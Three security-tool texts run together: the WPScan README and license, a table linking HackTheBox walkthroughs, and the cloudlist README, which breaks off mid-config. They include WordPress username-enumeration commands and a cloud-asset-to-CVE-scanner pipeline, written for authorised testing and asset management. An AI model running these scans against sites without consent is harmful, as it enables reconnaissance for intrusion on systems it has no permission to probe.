Protection (SIP), either install RVM and install wpscan again, or run ```sudo gem install -n /usr/local/bin wpscan``` (see [#1286](https://github.com/wpscanteam/wpscan/issues/1286)) ### From sources (NOT Recommended) Prerequisites: Git ```shell git clone https://github.com/wpscanteam/wpscan cd wpscan/ bundle install && rake install ``` # Updating You can update the local database by using ```wpscan --update``` Updating WPScan itself is either done via ```gem update wpscan``` or the packages manager (this is quite important for distributions such as in Kali Linux: ```apt-get update && apt-get upgrade```) depending how WPScan was (pre)installed # Docker Pull the repo with ```docker pull wpscanteam/wpscan``` Enumerating usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # Usage ```wpscan --url blog.tld``` This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then ```wpscan --stealthy --url blog.tld``` can be used. As a result, when using the ```--enumerate``` option, don't forget to set the ```--plugins-detection``` accordingly, as its default is 'passive'. For more options, open a terminal and type ```wpscan --help``` (if you built wpscan from the source, you should type the command outside of the git repo) The DB is located at ~/.wpscan/db WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last): - ~/.wpscan/cli_options.json - ~/.wpscan/cli_options.yml - pwd/.wpscan/cli_options.json - pwd/.wpscan/cli_options.yml If those files exist, options from them will be loaded and overridden if found twice. e.g: ~/.wpscan/cli_options.yml: ```yml proxy: 'http://127.0.0.1:8080' verbose: true ``` pwd/.wpscan/cli_options.yml: ```yml proxy: 'socks5://127.0.0.1:9090' url: 'http://target.tld' ``` Running ```wpscan``` in the current directory (pwd), is the same as ```wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld``` Enumerating usernames ```shell wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # PROJECT HOME [https://wpscan.org](https://wpscan.org) # VULNERABILITY DATABASE [https://wpvulndb.com](https://wpvulndb.com) # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2019 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScan’s core developers. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - [email protected]. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.
# HackTheBox CTF Cheatsheet This cheatsheet is aimed at CTF players and beginners to help them sort Hack The Box Labs on the basis of operating system and difficulty. This list contains all the Hack The Box writeups available on hackingarticles. We have performed and compiled this list based on our experience. Please share this with your connections and direct queries and feedback to [Hacking Articles](https://twitter.com/hackinarticles). [1.5]: https://raw.githubusercontent.com/Ignitetechnologies/Windows-Privilege-Escalation/main/linked.png [1.6]: https://www.linkedin.com/company/hackingarticles/ [1.3]: https://raw.githubusercontent.com/Ignitetechnologies/Windows-Privilege-Escalation/main/discord.png [1.4]: https://discord.com/invite/kyKvXwK4Bk [1.1]: https://raw.githubusercontent.com/Ignitetechnologies/Windows-Privilege-Escalation/main/twitter.png [1]: http://www.twitter.com/hackinarticles # Follow us on [![alt text][1.1]][1] [![alt text][1.3]][1.4] [![alt text][1.5]][1.6] ![image](https://github.com/Ignitetechnologies/HackTheBox-CTF-Writeups/blob/master/htb.png?raw=true) | No. | Machine Name | Operating System | Difficulty | |-----|--------------|------------------|------------------| | 1. | [Access](https://www.hackingarticles.in/hack-the-box-access-walkthrough/)|Windows|Easy| | 2. | [Active](https://www.hackingarticles.in/hack-the-box-active-walkthrough/)|Windows|Easy| | 3. | [Apocalyst](https://www.hackingarticles.in/hack-the-box-challenge-apocalyst-walkthrough/)|Linux|Medium| | 4. | [Aragog](https://www.hackingarticles.in/hack-the-box-aragog-walkthrough/)|Linux|Medium| | 5. | [Arctic](https://www.hackingarticles.in/hack-the-box-challenge-arctic-walkthrough/)|Windows|Easy| | 6. | [Ariekei](https://www.hackingarticles.in/hack-the-box-challenge-ariekei-walkthrough/)|Linux|Insane| | 7. | [Bank](https://www.hackingarticles.in/hack-the-box-challenge-bank-walkthrough/)|Linux|Easy| | 8. | [Bart](https://www.hackingarticles.in/hack-the-box-bart-walkthrough/)|Windows|Medium| | 9. | [Bashed](https://www.hackingarticles.in/hack-the-box-challenge-bashed-walkthrough/)|Linux|Easy| | 10. | [Beep](https://www.hackingarticles.in/hack-the-box-challenge-beep-walkthrough/)|Linux|Easy| | 11. | [Blocky](https://www.hackingarticles.in/hack-the-box-challenge-blocky-walkthrough/)|Linux|Easy| | 12. | [Blue](https://www.hackingarticles.in/hack-the-box-challenge-blue-walkthrough/)|Windows|Easy| | 13. | [Bounty](https://www.hackingarticles.in/hack-the-box-bounty-walkthrough/)|Windows|Easy| | 14. | [Brainfuck](https://www.hackingarticles.in/hack-the-box-challenge-brainfuck-walkthrough/)|Linux|Insane| | 15. | [Calamity](https://www.hackingarticles.in/hack-the-box-challenge-calamity-walkthrough/)|Linux|Hard| | 16. | [Canape](https://www.hackingarticles.in/hack-the-box-challenge-canape-walkthrough/)|Linux|Medium| | 17. | [Carrier](https://www.hackingarticles.in/hack-the-box-carrier-walkthrough/)|Linux|Medium| | 18. | [Celestial](https://www.hackingarticles.in/hack-the-box-celestial-walkthrough/)|Linux|Medium| | 19. | [Charon](https://www.hackingarticles.in/hack-the-box-challenge-charon-walkthrough/)|Linux|Hard| | 20. | [Chatterbox](https://www.hackingarticles.in/hack-the-box-challenge-chatterbox-walkthrough/)|Windows|Medium| | 21. | [Crimestoppers](https://www.hackingarticles.in/hack-the-box-challenge-crimestoppers-walkthrough/)|Windows|Hard| | 22. | [Cronos](https://www.hackingarticles.in/hack-the-box-challenge-cronos-walkthrough/)|Linux|Hard| | 23. | [Curling](https://www.hackingarticles.in/hack-the-box-curling-walkthrough/)|Linux|Easy| | 24. | [Dab](https://www.hackingarticles.in/hack-the-box-dab-walkthrough/)|Linux|Hard| | 25. | [Devel](https://www.hackingarticles.in/hack-the-box-challenge-devel-walkthrough/)|Windows|Easy| | 26. | [DevOops](https://www.hackingarticles.in/hack-the-box-devoops-walkthrough/)|Linux|Medium| | 27. | [Dropzone](https://www.hackingarticles.in/hack-the-box-dropzone-walkthrough/)|Windows|Hard| | 28. | [Enterprise](https://www.hackingarticles.in/hack-the-box-challenge-enterprises-walkthrough/)|Linux|Medium| | 29. | [Europa](https://www.hackingarticles.in/hack-the-box-challenge-europa-walkthrough/)|Linux|Medium| | 30. | [Falafel](https://www.hackingarticles.in/hack-the-box-challenge-falafel-walkthrough/)|Linux|Hard| | 31. | [Fighter](https://www.hackingarticles.in/hack-the-box-fighter-walkthrough/)|Windows|Insane| | 32. | [Fluxcapacitor](https://www.hackingarticles.in/hack-the-box-challenge-fluxcapacitor-walkthrough/)|Linux|Medium| | 33. | [FriendZone](https://www.hackingarticles.in/hack-the-box-friendzone-walkthrough/)|Linux|Easy| | 34. | [Frolic](https://www.hackingarticles.in/hack-the-box-frolic-walkthrough/)|Linux|Easy| | 35. | [Fulcurm](https://www.hackingarticles.in/hack-the-box-fulcrum-walkthrough/)|Linux|Easy| | 36. | [Giddy](https://www.hackingarticles.in/hack-the-box-giddy-walkthrough/)|Windows|Medium| | 37. | [Grandpa](https://www.hackingarticles.in/hack-the-box-challenge-grandpa-walkthrough/)|Windows|Easy| | 38. | [Granny](https://www.hackingarticles.in/hack-the-box-challenge-granny-walkthrough/)|Windows|Easy| | 39. | [Haircut](https://www.hackingarticles.in/hack-the-box-challenge-haircut-walkthrough/)|Linux|Medium| | 40. | [Hawk](https://www.hackingarticles.in/hack-the-box-hawk-walkthrough/)|Linux|Medium| | 41. | [Help](https://www.hackingarticles.in/hack-the-box-help-walkthrough/)|Linux|Easy| | 42. | [Holiday](https://www.hackingarticles.in/hack-the-box-holiday-walkthrough/)|Linux|Hard| | 43. | [Inception](https://www.hackingarticles.in/hack-the-box-challenge-inception-walkthrough/)|Linux|Medium| | 44. | [Irked](https://www.hackingarticles.in/hack-the-box-irked-walkthrough/)|Linux|Easy| | 45. | [Jail](https://www.hackingarticles.in/hack-the-box-challenge-jail-walkthrough/)|Linux|Insane| | 46. | [Jeeves](https://www.hackingarticles.in/hack-the-box-challenge-jeeves-walkthrough/)|Windows|Medium| | 47. | [Jerry](https://www.hackingarticles.in/hack-the-box-jerry-walkthrough/)|Windows|Easy| | 48. | [Joker](https://www.hackingarticles.in/hack-the-box-challenge-joker-walkthrough/)|Linux|Hard| | 49. | [Kotarak](https://www.hackingarticles.in/hack-the-box-challenge-kotarak-walkthrough/)|Linux|Hard| | 50. | [Lame](https://www.hackingarticles.in/hack-the-box-challenge-lame-walkthrough/)|Linux|Easy| | 51. | [Lazy](https://www.hackingarticles.in/hack-the-box-challenge-lazy-walkthrough/)|Linux|Medium| | 52. | [Legacy](https://www.hackingarticles.in/hack-the-box-challenge-legacy-walkthrough/)|Windows|Easy| | 53. | [Lightweight](https://www.hackingarticles.in/lightweight-hack-the-box-walkthrough/)|Linux|Medium| | 54. | [Mantis](https://www.hackingarticles.in/hack-the-box-challenge-mantis-walkthrough/)|Windows|Hard| | 55. | [Minion](https://www.hackingarticles.in/hack-the-box-minion-walkthrough/)|Windows|Insane| | 56. | [Mirai](https://www.hackingarticles.in/hack-the-box-challenge-mirai-walkthrough/)|Linux|Easy| | 57. | [Mischief](https://www.hackingarticles.in/hack-the-box-mischief-walkthrough/)|Linux|Insane| | 58. | [Netmon](https://www.hackingarticles.in/hack-the-box-netmon-walkthrough/)|Windows|Easy| | 59. | [Nibble](https://www.hackingarticles.in/hack-the-box-challenge-nibble-walkthrough/)|Linux|Easy| | 60. | [Nightmare](https://www.hackingarticles.in/hack-nightmare-vm-ctf-challenge/)|Linux|Insane| | 61. | [Nineveh](https://www.hackingarticles.in/hack-the-box-nineveh-walkthrough/)|Linux|Medium| | 62. | [Node](https://www.hackingarticles.in/hack-the-box-challenge-node-walkthrough/)|Linux|Medium| | 63. | [October](https://www.hackingarticles.in/hack-the-box-october-walkthrough/)|Linux|Medium| | 64. | [Olympus](https://www.hackingarticles.in/hack-the-box-olympus-walkthrough/)|Linux|Medium| | 65. | [Optimum](https://www.hackingarticles.in/hack-the-box-challenge-optimum-walkthrough/)|Windows|Easy| | 66. | [Poison](https://www.hackingarticles.in/hack-the-box-poison-walkthrough/)|FreeBSD|Medium| | 67. | [Popcorn](https://www.hackingarticles.in/hack-the-box-challenge-popcorn-walkthrough/)|Linux|Medium| | 68. | [SecNotes](https://www.hackingarticles.in/hack-the-box-secnotes-walkthrough/)|Windows|Medium| | 69. | [Sense](https://www.hackingarticles.in/hack-the-box-challenge-sense-walkthrough/)|FreeBSD|Easy| | 70. | [Shocker](https://www.hackingarticles.in/hack-the-box-challenge-shocker-walkthrough/)|Linux|Easy| | 71. | [Shrek](https://www.hackingarticles.in/hack-the-box-challenge-shrek-walkthrough/)|Linux|Hard| | 72. | [Silo](https://www.hackingarticles.in/hack-the-box-silo-walkthrough/)|Windows|Medium| | 73. | [Sneaky](https://www.hackingarticles.in/hack-the-box-challenge-sneaky-walkthrough/)|Linux|Medium| | 74. | [Solid State](https://www.hackingarticles.in/hack-the-box-challenge-solid-state-walkthrough/)|Linux|Medium| | 75. | [Stratosphere](https://www.hackingarticles.in/hack-the-box-stratospherewalkthrough/)|Linux|Medium| | 76. | [Sunday](https://www.hackingarticles.in/hack-the-box-sunday-walkthrough/)|Solaris|Easy| | 77. | [Tally](https://www.hackingarticles.in/hack-the-box-challenge-tally-walkthrough/)|Windows|Hard| | 78. | [TartarSauce](https://www.hackingarticles.in/hack-the-box-tartarsauce-walkthrough/)|Linux|Medium| | 79. | [Teacher](https://www.hackingarticles.in/hack-the-box-teacher-walkthrough/)|Linux|Easy| | 80. | [Tenten](https://www.hackingarticles.in/hack-the-box-challenge-tenten-walkthrough/)|Linux|Medium| | 81. | [Valentine](https://www.hackingarticles.in/hack-the-box-valentine-walkthrough/)|Linux|Easy| | 82. | [Vault](https://www.hackingarticles.in/hack-the-box-vault-walkthrough/)|Linux|Medium| | 83. | [Waldo](https://www.hackingarticles.in/hack-the-box-waldo-walkthrough/)|Linux|Medium| | 84. | [Ypuffy](https://www.hackingarticles.in/hack-the-box-ypuffy-walkthrough/)|Others|Medium| | 85. | [Zipper](https://www.hackingarticles.in/hack-the-box-zipper-walkthrough/)|Linux|Hard| | 86. | [Luke](https://www.hackingarticles.in/hack-the-box-luke-walkthrough/)|Linux|Easy| | 87. | [Bastion](https://www.hackingarticles.in/hack-the-box-challenge-bastion-walkthrough/)|Windows|Easy| | 88. | [Heist](https://www.hackingarticles.in/hack-the-box-heist-walkthrough/) | Windows | Medium | | 89. | [Bitlab](https://www.hackingarticles.in/hack-the-box-challenge-bitlab-walkthrough/) | Linux | Medium | | 90. | [Jarvis](https://www.hackingarticles.in/hack-the-box-jarvis-walkthrough/) | Linux | Medium | | 91. | [Writeup](https://www.hackingarticles.in/hack-the-box-writeup-walkthrough/) | Linux | Easy | | 92. | [Networked](https://www.hackingarticles.in/hack-the-box-networked-walkthrough/) | Linux | Medium | | 93. | [Haystack](https://www.hackingarticles.in/hack-the-box-haystack-walkthrough/) | Linux | Medium | | 94. | [Postman](https://www.hackingarticles.in/hack-the-box-postman-walkthrough/) | Linux | Easy | | 95. | [Wall](https://www.hackingarticles.in/hack-the-box-wall-walkthrough/)| Linux | Medium | | 96. | [Open Admin Box](https://www.hackingarticles.in/hack-the-box-open-admin-box-walkthrough/)| Linux | Easy | | 97. | [Monteverde](https://www.hackingarticles.in/hack-the-box-monteverde-walkthrough/)| Windows | Medium | | 98. | [Sauna](https://www.hackingarticles.in/hackthebox-sauna-walkthrough/)| Windows | Easy | | 99. | [Conceal](https://www.hackingarticles.in/conceal-hackthebox-walkthrough/)| Windows | Hard | | 100. | [Tabby](https://www.hackingarticles.in/tabby-hackthebox-walkthrough/)| Linux | Easy | | 101. | [Omni](https://www.hackingarticles.in/omni-hackthebox-walkthrough/)| Windows | Easy | | 102. | [Mango](https://www.hackingarticles.in/mango-hackthebox-walkthrough/)| Linux | Medium | | 103. | [Servmon](https://www.hackingarticles.in/servmon-hackthebox-walkthrough/)| Windows | Easy | | 104. | [Bastard](https://www.hackingarticles.in/bastard-hackthebox-walkthrough/)| Windows | Medium | | 105. | [Cascade](https://www.hackingarticles.in/cascade-hackthebox-walkthrough/)| Windows | Medium | | 106. | [Traverxec](https://www.hackingarticles.in/traverxec-hackthebox-walkthrough/)| Linux | Easy | | 107. | [Forest](https://www.hackingarticles.in/forest-hackthebox-walkthrough/)| Windows | Easy | | 108. | [Admirer](https://www.hackingarticles.in/admirer-hackthebox-walkthrough/)| Linux | Easy | | 109. | [Blunder](https://www.hackingarticles.in/blunder-hackthebox-walkthrough/)| Linux | Easy | | 110. | [SwagShop](https://www.hackingarticles.in/swagshop-hackthebox-walkthrough/)| Linux | Easy | | 111. | [Doctor](https://www.hackingarticles.in/doctor-hackthebox-walkthrough/)| Linux | Easy | | 112. | [Fuse](https://www.hackingarticles.in/fuse-hackthebox-walkthrough/)| Windows | Medium | | 113. | [LaCasaDePapel](https://www.hackingarticles.in/lacasadepapel-hackthebox-walkthrough/)| Linux | Easy | | 114. | [Magic](https://www.hackingarticles.in/magic-hackthebox-walkthrough/)| Linux | Medium | | 115. | [Traceback](https://www.hackingarticles.in/traceback-hackthebox-walkthrough/)| Linux | Easy | | 116. | [Remote](https://www.hackingarticles.in/remote-hackthebox-walkthrough/)| Windows | Easy | | 117. | [Book](https://www.hackingarticles.in/book-hackthebox-walkthrough/)| Linux | Medium | | 118. | [Cache](https://www.hackingarticles.in/cache-hackthebox-walkthrough/)| Linux | Medium | | 119. | [OpenKeyS](https://www.hackingarticles.in/openkeys-hackthebox-walkthrough/)| OpenBSD | Medium | | 120. | [Chaos](https://www.hackingarticles.in/chaos-hackthebox-walkthrough/)| Linux | Medium | | 121. | [Querier](https://www.hackingarticles.in/querier-hackthebox-walkthrough/)| Windows | Medium | | 122. | [Sniper](https://www.hackingarticles.in/sniper-hackthebox-walkthrough/)| Windows | Medium | | 123. | [Resolute](https://www.hackingarticles.in/resolute-hackthebox-walkthrough/)| Windows | Medium | | 124. | [SneakyMailer](https://www.hackingarticles.in/sneakymailer-hackthebox-walkthrough/)| Linux | Medium | | 125. | [Nest](https://www.hackingarticles.in/nest-hackthebox-walkthrough/)| Windows | Easy | | 126. | [Jewel](https://www.hackingarticles.in/jewel-hackthebox-walkthrough/)| Linux | Medium | | 127. | [Academy](https://www.hackingarticles.in/academy-hackthebox-walkthrough/)| Linux | Medium | | 128. | [Passage](https://www.hackingarticles.in/passage-hackthebox-walkthrough/)| Linux | Medium | | 129. | [Worker](https://www.hackingarticles.in/worker-hackthebox-walkthrough/)| Windows | Medium | | 130. | [Delivery](https://www.hackingarticles.in/delivery-hackthebox-walkthrough/)| Linux | Medium | | 131. | [Time](https://www.hackingarticles.in/time-hackthebox-walkthrough/)| Linux | Medium | | 132. | [Ready](https://www.hackingarticles.in/ready-hackthebox-walkthrough/)| Linux | Medium | | 133. | [Laboratory](https://www.hackingarticles.in/laboratory-hackthebox-walkthrough/)| Linux | Easy | | 134. | [Luanne](https://www.hackingarticles.in/luanne-hackthebox-walkthrough/)| OpenBSD | Easy | | 135. | [Scriptkiddie](https://www.hackingarticles.in/scriptkiddie-hackthebox-walkthrough/)| Linux | Easy | | 136. | [Knife](https://www.hackingarticles.in/knife-hackthebox-walkthrough/)| Linux | Easy | | 137. | [Spectra](https://www.hackingarticles.in/spectra-hackthebox-walkthrough/)| Linux | Easy | | 138. | [Love](https://www.hackingarticles.in/love-hackthebox-walkthrough/)| Windows | Easy | | 139. | [Cap](https://www.hackingarticles.in/cap-hackthebox-walkthrough/)| Linux | Easy | | 140. | [Armageddon](https://www.hackingarticles.in/armageddon-hackthebox-walkthrough/)| Linux | Medium | | 141. | [TheNotebook](https://www.hackingarticles.in/thenotebook-hackthebox-walkthrough/)| Linux | Medium | | 142. | [Explore](https://www.hackingarticles.in/explore-hackthebox-walkthrough/)| Linux | Easy | | 143. | [Seal](https://www.hackingarticles.in/seal-hackthebox-walkthrough/)| Linux | Medium | | 144. | [BountyHunter](https://www.hackingarticles.in/bounty-hunter-hackthebox-walkthrough/)| Linux | Medium | | 145. | [PIT](https://www.hackingarticles.in/pit-hackthebox-walkthrough/)| Linux | Medium | | 146. | [Toolbox](https://www.hackingarticles.in/hackthebox-toolbox-walkthrough/)| Linux | Medium | | 147. | [Previse](https://www.hackingarticles.in/previse-hackthebox-walkthrough/)| Linux | Easy | | 148. | [Writer](https://www.hackingarticles.in/writer-hackthebox-walkthrough/)| Linux | Medium | | 149. | [Intelligence](https://www.hackingarticles.in/intelligence-hackthebox-walkthrough/)| Linux | Medium | | 150. | [Forge](https://www.hackingarticles.in/forge-hackthebox-walkthrough/)| Linux | Medium | | 151. | [Anubis](https://www.hackingarticles.in/anubis-hackthebox-walkthrough/)| Linux | Insane | | 152. | [Horizontall](https://www.hackingarticles.in/horizontall-hackthebox-walkthrough/)| Linux | Easy | | 153. | [Return](https://www.hackingarticles.in/return-hackthebox-walkthrough/)| Windows | Easy | | 154. | [Timelapse](https://www.hackingarticles.in/timelapse-hackthebox-walkthrough/)| Windows | Easy | | 155. | [Driver](https://www.hackingarticles.in/driver-hackthebox-walkthrough/)| Windows | Easy | | 156. | [Pandora](https://www.hackingarticles.in/pandora-hackthebox-walkthrough/)| Linux | Easy | | 157. | [Paper](https://www.hackingarticles.in/paper-hackthebox-walkthrough/)| Linux | Easy | | 158. | [Goodgames](https://www.hackingarticles.in/goodgames-hackthebox-walkthrough/)| Linux | Easy | | 159. | [Backdoor](https://www.hackingarticles.in/backdoor-hackthebox-walkthrough/)| Linux | Easy | | 160. | [Late](https://www.hackingarticles.in/late-hackthebox-walkthrough/)| Linux | Easy | | 161. | [Nunchucks](https://www.hackingarticles.in/nunchucks-hackthebox-walkthrough/)| Linux | Easy | | 162. | [Antique](https://www.hackingarticles.in/antique-hackthebox-walkthrough/)| Linux | Easy |
<h1 align="center"> <img src="static/cloudlist-logo.png" alt="cloudlist" width="400px"></a> <br> </h1> <p align="center"> <a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/license-MIT-_red.svg"></a> <a href="https://github.com/projectdiscovery/cloudlist/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a> <a href="https://goreportcard.com/badge/github.com/projectdiscovery/cloudlist"><img src="https://goreportcard.com/badge/github.com/projectdiscovery/cloudlist"></a> <a href="https://github.com/projectdiscovery/cloudlist/releases"><img src="https://img.shields.io/github/release/projectdiscovery/cloudlist"></a> <a href="https://twitter.com/pdiscoveryio"><img src="https://img.shields.io/twitter/follow/pdiscoveryio.svg?logo=twitter"></a> <a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a> </p> <p align="center"> <a href="#features">Features</a> • <a href="#installation-instructions">Installation</a> • <a href="#usage">Usage</a> • <a href="#configuration-file">Configuration</a> • <a href="#running-cloudlist">Running cloudlist</a> • <a href="#supported-providers">Supported providers</a> • <a href="#cloudlist-as-a-library">Library</a> • <a href="https://discord.gg/projectdiscovery">Join Discord</a> </p> Cloudlist is a multi-cloud tool for getting Assets (Hostnames, IP Addresses) from Cloud Providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts. # Features <h1 align="left"> <img src="static/cloudlist-run.png" alt="cloudlist" width="700px"></a> <br> </h1> - Easily list Cloud assets with multiple configurations. - Multiple cloud providers support. - Highly extensible making adding new providers a breeze. - **stdout** support to work with other tools in pipelines. # Usage ```sh cloudlist -h ``` This will display help for the tool. Here are all the switches it supports. ```yaml Usage: ./cloudlist [flags] Flags: CONFIGURATION: -config string cloudlist flag config file (default "$HOME/.config/cloudlist/config.yaml") -pc, -provider-config string provider config file (default "$HOME/.config/cloudlist/provider-config.yaml") FILTERS: -p, -provider string[] display results for given providers (comma-separated) -id string[] display results for given ids (comma-separated) -host display only hostnames in results -ip display only ips in results -ep, -exclude-private exclude private ips in cli output OUTPUT: -o, -output string output file to write results -json write output in json format -version display version of cloudlist -v display verbose output -silent display only results in output ``` # Installation Instructions Download the ready to use binary from [release page](https://github.com/projectdiscovery/cloudlist/releases/) or install/build using Go ```sh go install -v github.com/projectdiscovery/cloudlist/cmd/cloudlist@latest ``` # Running Cloudlist ``` cloudlist ``` This will list all the assets from configured providers in the configuration file. Specific providers and asset type can also be specified using `provider` and `id` filter. ```console cloudlist -provider aws,gcp ________ _____ __ / ____/ /___ __ ______/ / (_)____/ /_ / / / / __ \/ / / / __ / / / ___/ __/ / /___/ / /_/ / /_/ / /_/ / / (__ ) /_ \____/_/\____/\__,_/\__,_/_/_/____/\__/ v0.0.1 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions [WRN] Developers assume no liability and are not responsible for any misuse or damage. [INF] Listing assets from AWS (prod) provider. example.com example2.com example3.com 1.1.1.1 2.2.2.2 3.3.3.3 4.4.4.4 5.5.5.5 6.6.6.6 [INF] Found 2 hosts and 6 IPs from AWS service (prod) ``` ## Running cloudlist with Nuclei Scanning assets from various cloud providers with nuclei for security assessments:- ```bash cloudlist -silent | httpx -silent | nuclei -t cves/ ``` # Supported providers - AWS (Amazon web services) - EC2 - Route53 - GCP (Google Cloud Platform) - Cloud DNS - DO (DigitalOcean) - Instances - SCW (Scaleway) - Instances - Fastly - Services - Heroku - Applications - Linode - Instances - Azure - Virtual Machines - Namecheap - Domain List - Alibaba Cloud - ECS Instances - Cloudflare - DNS - Hashistack - Nomad - Consul - Terraform # Configuration file The default provider config file should be located at `$HOME/.config/cloudlist/provider-config.yaml` and has the following contents as an example. In order to run this tool, the keys need to updated in the config file. ```yaml - # provider is the name of the provider provider: do # id is the name of the provider id id: xxxx # digitalocean_token is the API key for digitalocean cloud platform digitalocean_token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx - # provider is the name of the provider provider: scw # scaleway_access_key is the access key for scaleway API scaleway_access_key: SCWXXXXXXXXXXXXXX # scaleway_access_token is the access token for scaleway API scaleway_access_token: xxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxx - # provider is the name of the provider provider: aws # id is the name of the provider id id: staging # aws_access_key is the access key for AWS account aws_access_key: AKIAXXXXXXXXXXXXXX # aws_secret_key is the secret key for AWS account aws_secret_key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx # aws_session_token session token for temporary security credentials retrieved via STS (optional) aws_session_token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx - # provider is the name of the provider (Google Cloud Platform) provider: gcp # profile is the name of the provider profile id: logs # gcp_service_account_key is the minified json of a google cloud service account with list permissions gcp_service_account_key: '{xxxxxxxxxxxxx}' - # provider is the name of the provider provider: azure # id is the name of the provider id id: staging # client_id is the client ID of registered application of the azure account (not requuired if using cli auth) client_id: xxxxxxxxxxxxxxxxxxxxxxxxx # client_secret is the secret ID of registered application of the zure account (not requuired if using cli uth) client_secret: xxxxxxxxxxxxxxxxxxxxx # tenant_id is the tenant ID of registered application of the azure account (not requuired if using cli auth) tenant_id: xxxxxxxxxxxxxxxxxxxxxxxxx #subscription_id is the azure subscription id subscription_id: xxxxxxxxxxxxxxxxxxx #use_cli_auth if set to true cloudlist will use azure cli auth use_cli_auth: true - # provider is the name of the provider provider: cloudflare # email is the email for cloudflare email: [email protected] # api_key is the api_key for cloudflare api_key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx - # provider is the name of the provider provider: heroku # id is the name of the provider id id: staging # heroku_api_token is the api key for Heroku account heroku_api_token: xxxxxxxxxxxxxxxxxxxx - # provider is the name of the provider provider: linode # id is the name of the provider id id: staging # linode_personal_access_token is the personal access token for linode account linode_personal_access_token: XXXXXXXXXXXXXXXXXXXXXXXX - # provider is the name of the provider provider: fastly # id is the name of the provider id id: staging # fastly_api_key is the personal API token for fastly account fastly_api_key: XX-XXXXXXXXXXXXXXXXXXXXXX- - # provider is the name of the provider provider: alibaba # id is the name of the provider id id: staging # alibaba_region_id is the region id of the resources alibaba_region_id: ap-XXXXXXX # alibaba_access_key is the access key ID for alibaba cloud account alibaba_access_key: XXXXXXXXXXXXXXXXXXXX # alibaba_access_key_secret is the secret access key for alibaba cloud account alibaba_access_key_secret: XXXXXXXXXXXXXXXX - # provider is the name of the provider provider: namecheap # id is the name of the provider id id: staging # namecheap_api_key is the api key for namecheap account namecheap_api_key: XXXXXXXXXXXXXXXXXXXXXXX # namecheap_user_name is the username of the namecheap account namecheap_user_name: XXXXXXX - # provider is the name of the provider provider: terraform # id is the name of the provider id id: staging #tf_state_file is the location of terraform state file (terraform.tfsate) tf_state_file: path/to/terraform.tfstate - # provider is the name of the provider provider: nomad # nomad_url is the url for nomad server nomad_url: http:/127.0.0.1:4646/ # nomad_ca_file is the path to nomad CA file # nomad_ca_file: <path-to-ca-file>.pem # nomad_cert_file is the path to nomad Certificate file # nomad_cert_file: <path-to-cert-file>.pem # nomad_key_file is the path to nomad Certificate Key file # nomad_key_file: <path-to-key-file>.pem # nomad_token is the nomad authentication token # nomad_token: <nomad-token> # nomad_http_auth is the nomad http auth value # nomad_http_auth: <nomad-http-auth-value> - # provider is the name of the provider provider: consul # consul_url is the url for consul server consul_url: http://localhost:8500/ # consul_ca_file is the path to consul CA file # consul_ca_file: <path-to-ca-file>.pem # consul_cert_file is the path to consul Certificate file # consul_cert_file: <path-to-cert-file>.pem # consul_key_file is the path to consul Certificate Key file # consul_key_file: 